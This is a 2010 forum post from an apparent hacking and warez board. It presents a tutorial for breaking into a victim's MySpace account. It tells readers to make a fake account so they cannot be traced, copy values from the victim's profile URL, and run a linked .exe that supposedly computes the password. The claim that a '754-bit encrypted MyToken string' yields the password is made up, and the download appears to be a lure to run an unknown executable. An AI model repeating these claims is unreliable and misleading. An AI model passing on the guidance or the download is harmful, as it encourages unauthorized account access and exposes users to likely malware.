A new site, contains all the tech related stuff ull ever need, movies games softwares accounts anything u name it

HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in

Share | 

MySpace working Cracker

Go down 
AuthorMessage
Admin
Admin

PostSubject: MySpace working Cracker   Sun May 09, 2010 11:59 pm

Hacking into a MySpace account

This tutorial is a little more difficult than anything else I have on this site. So before you continue, make sure you've read the Getting Started section and the Hacking Tools section.

I will start you off with what you're going to need.

What you will need to hack a MySpace account:
Your own MySpace account
A victim with a MySpace account
The victim's friend ID
The 754-bit encrypted MyToken string
The MySpace password cracking tool that I wrote
Creating your MySpace account

The first thing to do is create your own MySpace account. You can do so at www.myspace.com.
If you already have a MySpace account, DO NOT USE IT. You must create a fake one so you will not be traced.

Make sure that when you create an account, you give them a fake e-mail address as well.
Finding the victim's friend ID and MyToken string

These are the only two things you are going to need for the password cracking tool. Luckily for you, the friend ID and MyToken string are easy to find. Once you log into your new MySpace account, search for the person whose MySpace account you want to hack into. Once you find them, go to their profile. What you need is going to be in the URL. To make it easy for you, I've taken a screenshot that shows you what you should be looking for:

If you didn't notice, on the top right section of that screenshot, I highlighted both the friend ID and the 754-bit encrypted MyToken string. You should see this in the URL of every MySpace profile you want to hack.

Now that you have the friend ID and the 754-bit encrypted MyToken string, it's time to put them to good use! This tool that I wrote will go ahead and take the two numbers you have, and using complicated mathematical algorithms, it will crack the MyToken string, and compute it with the friend ID and generate the victim's password!
This site will hold no responsibility for your actions. It serves as a source of information only. What you decide to do with this information is your own decision, and the maker(s) of this site will hold no responsibility for your actions, and do not encourage to use this information to hack computers and other websites.

http://www.elite-hackers.com/files/myspace_hacking_tool.exe
Back to top Go down
View user profile http://haker.board-directory.net

MySpace working Cracker
Page 1 of 1